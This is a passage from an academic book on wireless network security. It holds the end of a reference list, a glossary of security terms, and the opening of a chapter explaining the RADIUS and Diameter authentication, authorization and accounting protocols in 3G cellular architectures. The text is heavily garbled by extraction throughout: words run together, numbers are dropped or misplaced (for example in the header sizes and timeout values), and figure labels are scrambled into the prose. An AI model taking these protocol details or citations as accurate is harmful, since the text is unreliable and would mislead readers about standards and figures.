3rd Generation Partnership Projects (3GPP). (2004, network environments. In Embedded and Ubiq-
July). Technical standardization groups-system uitous Computing (LNCS 4096).
and architecture (TSG-SA) working group 3 Kálmán, Gy., & Noll, J..026)( SIM as a key of
(Security) meeting, 3GPP2 security—Report to useridentification:Enablingseamlessuserident
GPP,
3 S38.5-04 Retrieved December 20, 2006, management in communication networks. Paper
from www.3gpp.org/ftp/TSG_SA/WG3_Security/ presented at the WWRF meeting #17.
TSGS3_34_Acapulco/Docs/PDF/S3-040588.pdf
Kálmán, Gy., & Noll, J. .027)( SIM as secure
3rd Generation Partnership Projects (3GPP)2. key storage in communication networks. In The
(2007). TSG-X/TIA TR-6,.5 4 GPP2
3 system to International Conference on Wireless and Mobile
wireless local area network interworking to be Communications ICWMC’07.
published as 3GPP2 X.S0028. Retrieved December
22, 2006 Kim, S., Ahn, T., & Oh, H..026)(An efficient
hierarchical group key management protocol for

a ubiquitous computing environment. In Com- the 4th ACM workshop on Digital rights manage-
putational Science and Its Applications—ICCSA ment, Washington, DC.
02 6 (LNCS 3983).
Ren, K., Lou, W., Kim, K., & Deng, R. (2006).
Kwak,J.Oh,
, S.Won,
&, D.Efficient
.0 2 6 ) ( key A novel privacy preserving authentication and
distribution protocol for electronic commerce access control scheme for pervasive computing
in mobile communications. In Applied Parallel environments. IEEE Transactions on Vehicular
Computing (LNCS 3732). Technology,5 (4), 1373-1384.
Lee, J.-H., & Chung, T.-M. (2006). Session key Rieback, M. R., Gaydadjiev, G. N., Crispo, B.,
forwarding scheme based on AAA architecture Hofman, R. F. H., & Tanenbaum, A. S. (2006,
in wireless networks. In Parallel and Distributed December 3-8). A platform for RFID security and
Processing and Applications (LNCS 4330). privacy administration. Paper presented at the
20th USENIX/SAGE Large Installation System
Lim, J.-M., Lim, H.-J., & Chung, T.-M. (2006).
Administration Conference—LISA 2006, Wash-
Performance evaluation of public key based
ington, DC.
mechanisms for mobile IPv4 authentication in
AAA environments. In Information Networking. Sufatrio, K. Y. L. (1999, June 23-25). Registra-
Advances in Data Communications and Wireless tion protocol: A security attack and new secure
Networks (LNCS 3961). mini-mal public-key based authentication. Paper
presented at the International Symposium on
Nicholson, A. J., Corner, M. D., & Noble, B. D.
Parallel Architectures, Algorithms and Networks,
(2006). Mobile device security using transient
ISPAN’99. Fremantle, Australia.
authentication. IEEE Transactions on Mobile
Computing, 5 1489-1502.
(11), Sur,C.Rhee,
&, K.H.An
.026)( efficientauthen -
ticationandsimplifiedcertificate - statusmana
Noll, J., Ribeiro, V., & Thorsteinsson, S. E. (2005).
ment for personal area networks. In Management
Telecom perspective on scenarios and business in
of Convergence Networks and Services (LNCS
home services. In Proceedings of the Eurescom
4238).
Summit502 (pp 249-257).
Zou, X., Thukral, A., & Ramamurthy, B. (2006).
Nützel, J., & Beyer, A. (2006). How to increase
An authenticated key agreement protocol for mobile
the security of digital rights management systems
ad hoc networks. In Mobile Ad-hoc and Sensor
without affecting consumer’s security, In Emerg-
Networks (LNCS 4325).
ing Trends in Information and Communication
Security (LNCS 3995).
Pfeifer, T., Savage, P., Brazil, J., & Downes, B.
kEy tErMs
(2006). VidShare: A management platform for
Diffie-Hellman Key Exchange: Diffie-Hell -
peer-to-peer multimedia asset distribution across
man key exchange is a procedure, which allows
heterogeneous access networks with intellectual
negotiating a secure session key between parties,
property management. In Autonomic Management
who do not have any former information about
of Mobile Multimedia Services (LNCS 4267).
each other. The negotiation messages are in band,
Phillips, T., Karygiannis, T., & Kuhn, R. (2005). but because of the non-polynomial (NP) problem
Security standards for the RFID market. IEEE used in the procedure, adversaries are not able to
Security & Privacy Magazine, 3(6), 85-89. compromise it.
Popescu, B. C., Crispo, B., Tanenbaum, A. S., & Mutual Authentication: Mutual authentica-
Kamperman, F. L. A. J. (2004). A DRM security tion occurs when the communicating parties can
architecture for home networks. In Proceedings of mutually check each others identity, thus reducing

the possibility of a man-in-the-middle attack or Seamless Authentication: Seamless authenti-

other integrity attacks. cation is a method where the user is authenticated
towards an entity without the burden of credential
Out of Band Key Delivery: Out of band key
requests. For high security requirements, transpar-
delivery occurs when an encryption key is delivered
ent methods are not applicable, but can provide ad-
with a mean, which is inaccessible from inside the
ditional security in traditional username/password
network it will be used in. An example is to carry
or PIN-based sessions.
a key on an USB stick between parties, where the
key will never be transmitted over the network. Session Key: Session key is a short life, ran-
domly generated encryption key to protect one or
Rootkit: Rootkit is a kind of software to hide
a group of messages. The main purpose is to use
other programs. Mainly used by Trojans, they en-
expensive encryption operations only when start-
able hidden applications to access local resources
ing a session and use a simpler to manage cipher
without user knowledge.
in the later part.

Chapter XII
Architecture and Protocols for
Authentication, Authorization,
and Accounting in the Future
Wireless Communications
Networks
Said Zaghloul
Technical University Carolo-Wilhelmina – Braunschweig, Germany
Admela Jukan
Technical University Carolo-Wilhelmina – Braunschweig, Germany
AbstrAct
The architecture, and protocols for authentication, authorization, and accounting (AAA) are one of the
most important design considerations in third generation (3G)/fourth generation (4G) telecommunica-
tionnetworks. Many advanceshavebeenmadetoexploitthebenefits of the current syst
the protocol remote authentication dial in user service (RADIUS)protocol, and the evolution to migrate
into the more secure, robust, and scalable protocol Diameter. Diameter is the protocol of choice for the
IP multimedia subsystem (IMS) architecture, the core technology for the next generation networks. It is
envisioned that Diameter will be widely used in various wired and wireless systems to facilitate robust
and seamless AAA. In this chapter, we provide an overview of the major AAA protocols RADIUS and
Diameter, and we discuss their roles in practical 1xEV-DO network architectures in the
network tiers: access, distribution, and core. We conclude the chapter with a short summary of the cur-
rent and future trends related to the Diameter-based AAA systems.
Architecture and Protocols for AAA
IntroductIon and (3) a multimedia domain (MMD)1 based

core including both IP multimedia system (IMS)
Many 3G cellular providers consider the archi- networks and Internet access deployments. The
tecture for the authentication, authorization, and RAN, based on one of the 1x carrier evolution data
accounting (AAA) system as one of the most only (1xEV-DO) standards/revisions for wireless
important functional blocks for the success of transmission, consists of various base stations
service delivery. Typically, users are authenti- (BSs) and radio network controllers (RNCs). The
cated when requesting a service and only after distribution network consists of the MIP elements,
successful authentication they are authorized to that is, the packet data serving node (PDSN) playing
use the service. Once the user is granted access the foreign agent’s (FA) role and the home agent
to the service, the network generates accounting (HA). It is worth observing that this architecture
messages based on the user’s activity. Currently, has a hierarchical nature, where multiple BTSs
the remote authentication dial in user service are governed by a single RNC and multiple RNCs
(RADIUS) protocol is the most widely deployed are covered by a single PDSN region. Finally, at
protocol in cellular networks to perform subscriber the core, we have the IMS elements, including
AAA. Since RADIUS is susceptible to various se- it standardized elements such as the call session
curity threats, a standard developed by the Internet control functions (CSCF) and home subscriber
Engineering Task Force (IETF), called Diameter, servers (HSS) enabling robust applications and
was proposed to substitute RADIUS in the future. services such as gaming, presence, voice over IP
Unlike its predecessor RADIUS, Diameter of- (VoIP), and so forth.
fers reliable and secure communication enabling Upon receiving a mobile subscriber call, the
seamless roaming among operators and support RNC authenticates the subscriber’s request by
of auditability, capability negotiation, and peer communicating with the access network AAA
discoveryandconfiguration.Diameteraugments (AN-AAA) over the RADIUS-based A12 interface.
its reliable transmission capabilities by defining
Once authenticated, the RNC contacts the PDSNs
failover mechanisms and thus embraces two crucial through the A10/A11 interface (3rd Generation
elements for the robust communication of sensitive Partnership Project 2 [3GPP2] A.S0008-B, 2006).
billing and authentication messages. Since most of Note that since the A12 interface is RADIUS
the current equipment and radio standards only based, a translation agent (TA) needs to be used
support RADIUS for authentication, it is evident to translate the RADIUS requests to Diameter for
that cellular network operators will be running both authentication. In Figure 1, we illustrate that the
protocols in the near future. Therefore, it can not AAA contacts an Oracle-based users’ database to
besufficientlyemphasizedthatprudent decisions
authenticate the incoming calls. We assume that
need to be made when designing AAA systems the TA, AAA, and the AN-AAA are collocated
with multiple protocols in mind at the three major in the same physical platform for simplicity. For
tiers: access, distribution, and core. higher reliability, RNCs usually connect to multiple
The purpose of this chapter is to address the AAAs (one primary and another secondary AAAs)
specific aspects of the AAA system architecture to allow redundancy to admit users into the system
of these three major tiers. Given the broadness in case of AN-AAA connectivity problems.
of the scope and the myriad of the existing AAA Once admitted, the mobile node (MN) starts a
standards, we sharpen our focus on a reference point-to-point (PPP) session with the PDSN. Dur-
G3 cellularnetworkarchitecturewhich wedefine
ing the process of PPP establishment, the PDSN
and show in Figure 1. As can be seen from Figure advertises itself as a MobileIP FA and challenges
1, a typical AAA system in 3G architectures is the user. The user then replies with a Mobile IP
characterized by three distinctive architectural registration request that answers the PDSN’s chal-
elements: (1) radio access network (RAN), (2) lenge. The PDSN forwards this information to
distribution network based on mobile IP (MIP), the AAA. The AAA validates the user’s response

FigureA1. 1xEV-DOreferencenetworkarchitecture
Acronyms diameter
bts: Base Transceiver Station
rnc: Radio Network Controller A10/A11
An/AAA: Access Network AAA
Pdsn: Packet Data Serving Node Primary PDSN MIP
MIP: Mobile IP
RNC HA
link (FA) tunnel
fA: Foreign Agent
HA: Home Agent A12
diameter
tA An/AAA
fail
tA: Diameter Translation Agent
IMs: IP Multimedia Subsystem
ove
sftP: Secure File Transfer Protocol
sq
ora net 2

r li
sql: Structured Query Language
sftP
l*
cle
nk
Billing users IMs Internet
Internet
bts 1 System IMs
t1 circuits db
bts 3 Multimedia domain (MMd)
bts 2
bts 5
bts 4 tA An/AAA
A12 PDSN
bts 6 RNC HA
(rAdIus) (FA)
1xEv-do radio Access network (rAn)
based on the MN-AAA shared secret and responds of Diameter at all the three major network tiers in
to the PDSN. In case of successful authentication, the wireless network, including access, distribu-
the PDSN proceeds with the MobileIP registration tion, and core. Finally, we summarize the chapter
process with the HA and establishes a MobileIP and discuss open issues and future work.
tunneltoservetheuser’straffic.Atthispoint,the
PDSN starts to generate accounting towards the
AAAservertoreflectthesubscriber’s - usage.Ac
bAckground
counting data is reformatted and is communicated
to the upstream billing systems for further process- the rAdIus Protocol
ing. Here, we assume simple secure FTP (SFTP)
communication. Note that the PDSN also connects AAAsystemsreceivedsignificantattentionfrom
to multiple AAA’s for redundancy purposes. In our network service providers throughout the past
illustrative architecture, the PDSN implements the decade. The need for a standardized, simple, and
Diameter MobileIP application and thus needs no scalable protocol that accomplishes the required
translation functionality. AAA functionality was the main motivation for
In this illustrative reference architecture, RA- the introduction of the (RADIUS) protocol (Ri-
DIUS is deployed in the access tier and translation gney, 2000; Rigney Willens, Rubens, & Simpson,
agents were utilized to convert between RADIUS 2000; RFC2866). In 1998, RADIUS was the only
and Diameter, while Diameter applications at protocolthatseemedtosatisfytheIETFNASREQ
the distribution and network tiers were natively working group’s requirements for authentication
supported. Following this example, we organize and authorization (Rigney, 1998). Due to its wide
the chapter as follows. First, we present the AAA implementation by many networking equipment
concept and quickly survey RADIUS and its cur- vendors, its simplicity and scalability, it became
rent deployment features. Then, we discuss the the protocol of choice for many service providers.
evolution from RADIUS to Diameter and shortly RADIUS was quickly extended to support various
review the current Diameter standard. Afterwards, networking protocols such as MobileIP (Perkins,
we illustrate a prospective end-to-end application 2002), IP security (IPsec) (Kent & Seo, 2005), and
the IEEE 802.1x authentication.
0
Figure 2. A simple service provider’s architecture with AAA functionality

tcP/IP
nAs
Internet PPP
Pstn PPP
Internet
RADIUS Traffic
& Authorization
Authentication
Accounting
sql, ldAP s/ftP, sql
db
users’ database
AAA server billing systems
In RADIUS, after the user is granted access, the granted access, the NAS generates accounting
network access server (NAS) generates accounting messages based on user’s activity (connection time,
messages based on the user’s activity. The NAS is total bytes used, etc).
usually the gateway to the IP network. Routers, The RADIUS message format is shown in Fig-
WiFi access points (APs), PDSNs, and gateway ure 3. It consists of a 20 octet header followed by
general packet radio service (GPRS) support nodes multiple AVPs. AVPs include standardized types
(GGSN) in GPRS networks, are typical examples of and values. For example, the username is passed to
NASs in telecom networks. As shown in Figure 2, the AAA server using the User-Name attribute. To
a user tries to access the Internet through a dialup allow expandability, the AVP type 26 is reserved
modem connection. The PPP protocol is mainly for vendor-specific AVPs (VSAs). Thus, a vendor
used to establish the communication between the requests a Vendor IDfrom the Internet Assigned
user and the NAS, that is, the router in this example. Numbers Authority (IANA) to be able to define
The NAS attempts to authenticate the user either specificattributesforhisequipment.Thefollowin
through the password authentication protocol (PAP) are sample vendor ID values: Cisco (9), Nortel (2637),
or the challenge handshake authentication protocol 3GPP (10415), and 3GPP2 (5535). Usually, AAA
(CHAP). Upon obtaining the responses from the implementationsincludedictionaryfilesthatde
client, the NAS generates an Access-Request and the AVP type and the expected values, for example
sends it to the RADIUS server in order to validate refer to Braunöder (2003). RADIUS accounting
the user’s responses. Typically, the RADIUS server is composed of three primary message types: (1)
is connected to an external database that contains the Accounting-Start, (2) Accounting-Interim, and (3)
user’s credentials and authorized services. Thus, the Accounting-Stop. Accounting messages usually
RADIUS server returns an Access-Accept message carry the user’s session information. For example,
if the user credentials are valid, otherwise it returns in CDMA2000-based systems accounting messages
an Access-Reject. The Access-Accept message may may contain the user’s assigned IP address; user’s
contain authorization information. For example, sent and received byte counts; user’s electronic
anAccess-Acceptmessagemaycontain:filters to calling and called station numbers;
serial number;
granttheuseraccesstointernalnetworks, accounting specific
session ID; BS ID; and so forth, (3GPP2
routing instructions to the NAS, quality of service A.S0008-B, 2006; 3GPP2 X.S0011-005-C, 2006).
QoS)
( settings,andsoforth.Thisauthorization set
Note that the electronic serial number and the BS
is returned as a group of attribute value pairs (AVP) ID attributes are 3GPP2 VSAs augmented to the
in the Access-Accept message.2 Once the user is standard RADIUS AVPs.

Figure 3. RADIUS message format

1 octet 1 octet 2 octets 16 octets variable
Code
Code ID
ID Length
Length Authenticator
Authenticator Multiple AVPs
AVPs
rAdIus Header (20 octets)
rAdIus Message format
Common RADIUS Code

1 octet 1 octet t1 octet
Access-Request []
Access-Accept [] Attribute Length
Attribute Length Value
Value
Access-Reject []
Accounting -Request []
Attribute value Pair (AvP) structure
Accounting -Response []
Access-Challenge []
1 octet 1 octet 4 octets 1 octet 1 octet variable

Vendor Vendor Attribute
Attribute Length Vendor ID
Value = 26 Type Length Specific
Example vendor specific AvP structure
notes
The authenticator field is a random nonce in the requests while in
the responses it is a MD hash calculated using the shared secret
between the NAS and the AAA server and the random nonce from
the corresponding requests
An Access -Challenge is usually used when multiple round trips are
needed for authentication, for example RADIUS extensions for EAP
Accounting requests are identified by the value of the
Acct -Status --Type attribute (AVP 0) {=Start, =Stop, =Interim}
RADIUS offers reliability over the intrinsically the request to another RADIUS server. Such poli-
3
unreliable user datagram protocol (UDP) by requir- cies are occasionally based on the domain in the
ing a response for each request. If a response is user’snetworkaccessidentifier( NAI)Standards .
notreceivedwithinapredefinedtimeperiod (Aboba &TO)( Vollbrecht,
, 1999) refer to this setup as
the request times out. It is then up to the requestor the proxy-chain configuration. For instance, in a
(RADIUS client) to either retry the same server, roamingscenariothehostAAAisusually - config
another RADIUS server, or even drop the request. ured to forward AAA requests from the hosting
The timeout value and the maximum number of NAS to the home AAA. Note that multiple proxies
allowed retransmissions are configurable - paramalong the path to the home AAA
maybe traversed
eters at the client. It is noteworthy to mention that server as shown in Figure 4.
the failover mechanism was not standardized in
RADIUS and often raised interoperability issues Evolution from rAdIus to diameter
due to the inherent differences in the AAA imple-
mentations (Calhoun, Loughney, Guttman, Zorn, Diameter Protocol Overview
& Arkko, 2003).
RADIUS follows a client/server model where As network architectures evolved and with the
clients maybe NASs or other RADIUS servers. tremendous growth in the wireless data infrastruc-
RADIUS clients and servers share a common secret tures, secure inter-domain communication among
to secure their communications. This method is various AAA servers to exchange subscribers’
weak and is only intended to secure communica- credentials, profiles, and accounting - informa
tion within a trusted network.4 Sometimes an AAA tion became an absolute necessity. Despite its
server serves as a RADIUS client/proxy when it is tremendous success, RADIUS inherent security
provisioned with a policy instructing it to forward vulnerabilities, its questionable transport reli-

Figure4.Proxychainconfiguration
visited network Intermediate broker network Home network
access-request access-request
visited Home
rAdIus Host rAdIus rAdIus
network’s rAdIus
nAs AAA Proxy 1 Proxy 2
AAA server
access-accept access-accept
Figure5.Diameterprotocol
legend
Fields carried over from RADIUS
New Diameter fields
4-bits
R P E T Reserved
request = Proxiable = Error = Potentially Retransmitted =
Answer = 0 Local Only = 0
1 octet 3 octets 1 octet 3 octets 4 octets

Version Message Command Command
Set to 1
Application ID
Length Flags Code
Hop-By-Hop End -to-End
Multiple AVPs
Identifier Identifier
4 octets 4 octets variable
4 octets 1 octet 3 octets 4 octets 4 -bits

AVP Code Flags AVP Length Vendor -ID (opt) Data
v : Vendor Specific
V M P Reserved M : Mandatory
P : Requires End-to-End Security
ability, and its limited redundancy support were by standardized failover and failback (recovery)
the primary reasons for the introduction of the mechanisms.
Diameter protocol (Calhoun et al., 2003) as a sub- Diameter RFC reused many of the RADIUS
stitute protocol. Diameter was carefully designed message codes and attributes and extended them.
to address security and reliability while thoroughly Figure 5 shows Diameter’s header format. The
exploitingthebenefitsofRADIUS.Thus,secure framed fields in Figure 5 are those carried over
transmission mechanisms using a choice of IPsec from RADIUS. In contrast to RADIUS, note the
or transport layer security (TLS) protocols were introduction of the Version, Command Flags, Ap-
integrated into Diameter, while reliable transport plication ID, Hop-By-Hop ID, and End-to-End ID
was enhanced by designing Diameter to run over fieldsinDiameter.Alsonotetheincreaseinsizeof
either stream control transmission protocol (SCTP) themessagelengthfieldfrom ( octets
2 inRADIUS
or transmission control protocol (TCP) supported to 3 in Diameter). Note also that the authenticator

fieldisnolongerpresentassecurityis theguaranteed
request from prior to forwarding it. The reader
by the integrated IPsec and TLS protocols. Com- is encouraged to refer to Calhoun et al. (2003) for
mand codes in Diameter start from 257 to maintain more information on routing AVPs and their usage.
compatibility with RADIUS. Unlike in RADIUS, Finally redirect agents, as their name implies, are
the requests and answers have the same command used to refer clients to alternative AAAs. Redirect
codes in Diameter, for example, the accounting agents may act as proxies or end servers for other
request (ACR) and answer (ACA) commands have requests. For example, an AAA server may handle
the command-code of 271. Diameter nodes can the Diameter base accounting messages while
recognize message types (e.g., whether it is ACA or redirecting requests that require Diameter server
ACR)basedonthe“R”ag fl inthecommandags fl support for MobileIP. Figure 6 summarizes the
shown in Figure. 5The “P” ag fl instructs nodes functionality of Diameter agents and illustrates the
whether a message must be processed locally and messageow fl inorderoftransmission.InFigure
shouldnotbeforwarded.The“E”ag fl alongwith
6a, the relay agent only forwards the Diameter
the result-code AVP is used to indicate errors (and Authentication and Authorization Request (AAR)
possibly redirection as we will see later). Finally, to Provider’s B Diameter server. In Figure 6b, the
the“T”ag fl isusedtoindicateapossible - duplica
proxy agent has an outbound policy for AAR to
tion in case of retransmissions after a failover. add or override the session Idle-Timeout attribute
Figure 5 also shows Diameter’s AVP structure. to 4,000 seconds and maximum link MTU to 1,300
The most significant addition is the inclusion bytes.Itisalso of configuredwithaninboundpolicy
theags fl field. for the Authentication and Authorization Answers
(AAA) to remove any instructions for compression.
Diameter Agents Figure 6c shows the translation agent’s role. Note
that a translation agent may at the same time act
To facilitate migration from the current RADIUS as a proxy, that is, add, modify, or remove AVPs
infrastructure, Diameter offers indirect backward while converting between RADIUS and Diameter.
compatibility by introducing translation agents to Finally, as shown in Figure 6d, the Diameter client
convert RADIUS messages into Diameter mes- issues an AAR towards the redirect agent. Once
sages and vice versa. Besides the main incentive received, the redirect agent sends back an AAA
of reusing as much of the RADIUS codes and with the “E” ag fl set with the result-code AVP
attributes as possible for simpler migration, such set to DIAMETER_REDIRECT_INDICATION
reuseisalsobeneficialinreducingthe amount
instructing theofDiameter client to contact dest.com
processing on the translation agents. Diameter by using the Redirect-Host AVP. A redirect agent
supportsabroaderdefinitionofscalability may also to suite
provide indication on the usage of the
roaming scenarios by including relay and redirect redirect instruction, that is, whether its response
agents while still maintaining the RADIUS proxy is meant for all realms or simply restricted for the
agent model, therefore allowing the deployment of request’s realm, whether the redirection policy
different architectures. should be cached at the requestor (Client), and for
A proxy agent is used to forward Diameter traf- how long, and so forth.
fictoanotherDiameterpeerinordertohandlethe
request. The decision to forward requests is policy Server Initiated Messages in Diameter
based as in RADIUS. Proxy agents may modify
packets and may originate rejection messages in Unlike RADIUS, Diameter is a peer-to-peer pro-
case of policy violation, for example, in case of tocol where any Diameter node may act as a client
receiving requests from unknown realms. On the or server at any time. Peers are simply the next hop
other hand, relay agents only forward requests with- nodes that a Diameter node communicates with.
out modifying any of the non-routing attributes. A significant improvement over RADIUS is that
Relays and proxies are required to append the route- Diameter has mandatory support of server-initiated
record AVP with the identity of the peer it received messages to allow operations like re-authentication

Figure6.Diameteragents’operation
(a) relay Agent (b) Proxy Agent

network Provider A network Provider b network Provider A network Provider b
1 AAr 2 AAr 1 AAr 2 AAr
diameter relay diameter diameter Proxy diameter

client Agent server client Agent server
4 AAA 3 AAA
4 AAA 3 AAA
Add/override (AAr)
Idle-Timeout = 000
no change to any non-routing attributes Framed-MTU = 00
remove (AAA)
Framed-Compression
AcronyMs the proxy modifies diameter messages
AAr: Authentication and Authorization Request

AAA: Authentication and Authorization Answer
(c) translation Agent (d) redirect Agent

network Provider A network Provider b
redirect
AAr
Agent
1 2
access-request
E
rAdIus translation diameter AAr AAA
client rAdIus Agent dIAMEtEr server
access-accept 1 2
4 3 AAA
3 AAr
remove (AAA) diameter diameter
Framed-Compression client server
4 AAA dest.com
Note that a translation agent may modify requests
and answers similar to proxy agents redirect Agent AAA:
The error bit is set (E) in the AAA message header

The result-code AVP = DIAMETER_REDIRECT_INDICATION
Redirect-Host AVP = dest.com
Redirect-Host-Usage AVP = ALL_REALM
Redirect-Max-Cache-Time AVP = 00
and network triggered session abortion. Diameter Diameter Applications

outlines a policy based framework for end-to-end
security5 and establishes auditability and proof of So far, we have only presented a summary of the
agreement by mandating message path authoriza- so-called Diameter-based protocol, which must be
tion in case a message traverses multiple Diameter implemented by every Diameter node. One of the
agents between two providers. This is accomplished most powerful features in Diameter is the introduc-
by mandating authentication and authorization tion of the so-called “Diameter Applications.” A
for each Diameter node along the path between node’s capability to support certain applications is
two Diameter end-nodes. For instance, a service exchanged upon connection setup in the so-called
level agreement (SLA) among providers A, B, Diameter capability exchange request and answer
and C prevents the intermediary provider C from (CER, CEA) messages (Calhoun et al., 2003). Note
passingAandB’saccountingtrafficthrough themany extensions were also added to
that although
untrusted network U. Here, Diameter offers path RADIUS to support different applications (e.g.,
authorization by requiring that each Diameter agent the Extensible Authentication Protocol [EAP],
(provider C in this example) append the identity for WiFi in Rigney, 2000), RADIUS does not in-
of the peer the request is received from prior to clude any mechanisms to inform clients whether
forwarding it. The Diameter servers must validate servers support such extensions. In other words,
the conformance of the route-record attributes with there is no standardized method to allow clients to
the service policy. Thus, if servers on A or B detect discover whether the EAP extension is supported
entries for any untrusted servers, an AUTHORIZA- on an arbitrary server. This problem was solved in
TION_REJECT error message is sent.

Diameter by introducing the concept of Diameter the Diameter credit control application but
applications. does not depend on it. Moreover, Diameter
It is important to understand that RFC 3588 SIP allows locating SIP servers when a SIP
definestheminimumprerequisitesforaDiameter agent requests routing information. Finally,
node implementation and maybe used by itself it provides a mechanism for pushing updated
only for accounting. In case of authentication and userprofilestotheservingSIPserverincase
authorization, a Diameter node must implement a theprofileisadministratively)
( updated.
specificapplication.Themostcommonapplications
are Diameter NAS (Calhoun, Zorn, Spence, & Mit- Finally, it is extremely important to understand
ton, 2005) and MobileIPv4 (Calhoun, Johansson, thatDiameterapplicationsneedtobedefinedonl
Perkins, Hiller, & McCann, 2005). The Diameter when none of the existing Diameter applications
NASapplicationdefinesNAS-relatedrequirements can support the required message ow fl without
where PPP-based authentication/authorization is majormodifications.Suchmajorchangesinclude
needed.DiameterMobileIPv4application defines
adding new mandatory AVPs, commands requiring
AAA functionality in scenarios where users roam differentmessageows fl fromanyofthecurrently
into foreign provider networks. The concept of definedapplications,orrequiringsupportfornew
Diameter applications was employed in many authentication methods with new AVPs (Fajardo
areas, and the following is a summary of three & Ohba, 2006).
major Diameter applications,
Protocol Mechanisms
• Diameter credit control application (Hakala,
Mattila, Koskinen, Stura, & Loughney, 2005) Diameter Peer Discovery
is proposed to handle online billing for prepaid
solutions. Prepaid billing implies real-time Diameter offers three primary means to discover
rating for the requested service, user’s bal- Diameter peers: static, Service Location Protocol
ance validation, and service suspension once Version 2 (SLPv2) queries, and domain name sys-
the user’s account is exhausted. Debiting and tem. Thus, a peer table entry is created after peer
crediting are also supported for some appli- discovery is executed. Note that peer discovery
cations such as gaming. Note that Diameter maybe triggered upon the reception of a CER. In
accountingdefinedinCalhounetal. some) 302 ( cases, policies may allow establishing con-
is mostly suitable for postpaid services where nections with unknown peers. In this case, the
off-line processing of accounting records is peer table entry is built from the peer’s identity in
performed. the CER and expires as soon as the connection is
• Diameter EAP (Eronen, Hiller, & Zorn, 2005) closed. In most of the cases, peer table entries for
is used to support end-to-end authentication in known peers are created along with their advertised
dial-up, 802.1x, 802.11i, and in IPsec IKEv2. applications. Thus, only requests for advertised
It eliminates the possibility of man-in-the- applications are forwarded to these peers.
middle attacks if node is compromised within
a proxy chain. Diameter Policies
• The Diameter Session Initiation Protocol (SIP)
application (Garcia-Martin, Belinchon, Pal- Routing tables provide guidance to the Diameter
lares-Lopez, Canales-Valenzuela, & Tammi, node on how to process a received request. Figure
2006) supports HTTP digest authentication 7 illustrates an example realm routing table for
(RFC2617) mandated by SIP (Rosenberg et Relay/Proxy Agent. Note that a policy includes
al., 2002) to allow SIP user agents and proxies a realm, an application identifier, and an action.
to authenticate and authorize user’s requests When forwarding is needed, the next hop server
to access certain resources. This application is given and whether the route entry was statically
does not depend on the Diameter NAS nor or dynamically discovered (through a redirect,
MobileIPv4 applications, where as it supports for example), along with its expiration time. The

Figure 7. Sample routing policy

RealmName=ourrealm.com AND destination=ourid,
ApplicationID=any, Action=LOCAL
RealmName=myMIPdomain.com, ApplicationID=MobileIPv4,
Action=REDIRECT, Next-Hop=ServerMIP.com,
Dynamic:ExpirationTime=900
RealmName=myMIPdomain.com, ApplicationID=DiameterNAS,
Action=PROXY, Next-Hop=ServerACT.com, Static, Proxy_Policy =
{outbound[Idle-Timeout=400],inbound[remove framed-compression]}
DefaultPolicy –Answer result-code=DIAMETER_UNABLE_TO_DELIVER
default policy in case no route is available is to a primary server and multiple secondary servers
return an error message with the DIAMETER_UN- for redundancy. When a communication problem
ABLE_TO_DELIVER result code. is detected, a secondary server is promoted to
primary and the primary is suspended. Notice that
Diameter Request Routing this is important to guarantee consistent failover
for all requests.
Diameter request routing refers to the process The link is considered responsive as long as
needed when originating, sending, and receiving acknowledgements arrive. If the link is idle for
requests. When originating a request, the Diameter “tw” seconds then a device watchdog request
node sets the Application-ID, the Origin-Host and (DWR) is sent. If no device watchdog answer
Origin-Realm AVPs along with the Destination- (DWA) arrives in “tw” seconds, the primary is
Host and/or realm. When receiving a message, the suspended, the secondary server is promoted,
node checks the route-record AVP to make sure that and all subsequent communication is sent to the
6
there are no routing loops. It also checks whether promoted server. Note that outstanding messages
it is the ultimate destination of the message. If maybe sent on the failover link and in this case the
not, the node acts as an agent and according to its “T”ag
fl issetineachmessagetoindicateto ( the
policy it relays, proxies, or redirects the message. end server) that such messages maybe duplicates.
Each forwarded (i.e., proxied7 or relayed) message If another “tw” seconds pass without receiving
is updated with a locally generated hop-by-hop the DWA on the suspended primary link, then
identifier. This field is used to match therequests
transport connection is closed. The connec-
and answers. Answers are routed opposite to tion may be retried periodically, but for reopened
how requests are routed and using the hop-by- connections, a connection validation procedure
hop identifiers the expected answersmust at each hop In this case, three watch-dog
be initiated.
are recognized. Using the hop-by-hop identifier messages must be answered before failing back to
and the saved sender’s information, the answer the original primary link (Aboba & Wood, 2003;
is forwarded back to the previous node with the Calhoun et al., 2003).
hop-by-hopidentifierrestoredtoitsoriginalvalue.
Thisprocessendsonceanodefindsitsidentity A Summaryin of Diameter’s Session
the origin-host. Management and Accounting
Diameter’s Failover and Failback A session is defined as “a related progression of

Algorithms events devoted to a particular activity” (Fajardo &
Ohba, 2006). When a Diameter node is required
Diameter implements the so-called watchdog algo- to keep track of sessions for later use the node
rithm to detect communication trouble and initiate is considered stateful, otherwise it is stateless.
the failover mechanism. A Diameter node may have For example, in the case where a server needs to

trigger re-authentication, it needs to maintain the A12 interface (3GPP2 A.S0008-B, 2006). The AN-
session state. This implies that session management AAA returns the subscriber’s International Mobile
is application specific. For example, a Diameter Subscriber Identity (IMSI) in the Callback-ID AVP
accounting server maybe configured to to thekeep
RNC in the RADIUS access-accept mes-
track of accounting messages such that it is able sage. Note that since the 1xEV-DO standard does
to eliminate duplicates and fraudulent messages not support Diameter yet, operators may utilize
(e.g., a unique Accounting-Start message should Diameter TAs to convert between RADIUS and
not arrive before an Accounting Stop message Diameter queries. The TA maybe collocated with
for an opened session). In cases where the server the AN-AAA as shown in Figure 1. Note that RNCs
is stateful, a Diameter client must always send a maybeconfiguredtofailovertoanotherAN-AAA
session-termination-request (STR) to the server for redundancy. Here, the reader should be aware
so that the server frees its allocated resources for that such failover is RADIUS based and is not based
the session. on the Diameter failover mechanisms.
RFC3588 (Calhoun et al., 2003) and RFC4005
(Calhoun, Zorn, et al., 2005) outline the accounting At the distribution layer:
process. Similar to RADIUS, Diameter accounting diameter MobileIPv4
requests (ACR) are sent and answers (ACA) are
received from servers. A new accounting type, The PDSN is considered the first IP gateway in
Event record, has been introduced to be used for 1xEV-DO networks. In MobileIPv4 architectures,
short connections where accounting Start and Stop MNs are expected to move from one PDSN region
records may arrive during very short time periods into another resulting in MobileIP handovers (HO).
(e.g., for push-to-talk services). Accounting Event The HA represents the home network to which the
records are also used to indicate accounting prob- MN’s IP address (Home Address) belongs. Here,
lems. For long connections (e.g., VoIP conferenc- we assume that the PDSN/FA and the HA natively
ing and file downloads), Start, Interim, and Stop
support the Diameter MobileIPv4 application (i.e.,
records are used. It is noteworthy to state that in no translation is involved). When the MN moves
case of reauthorization, an accounting Interim may into a foreign network, it attaches through a FA that
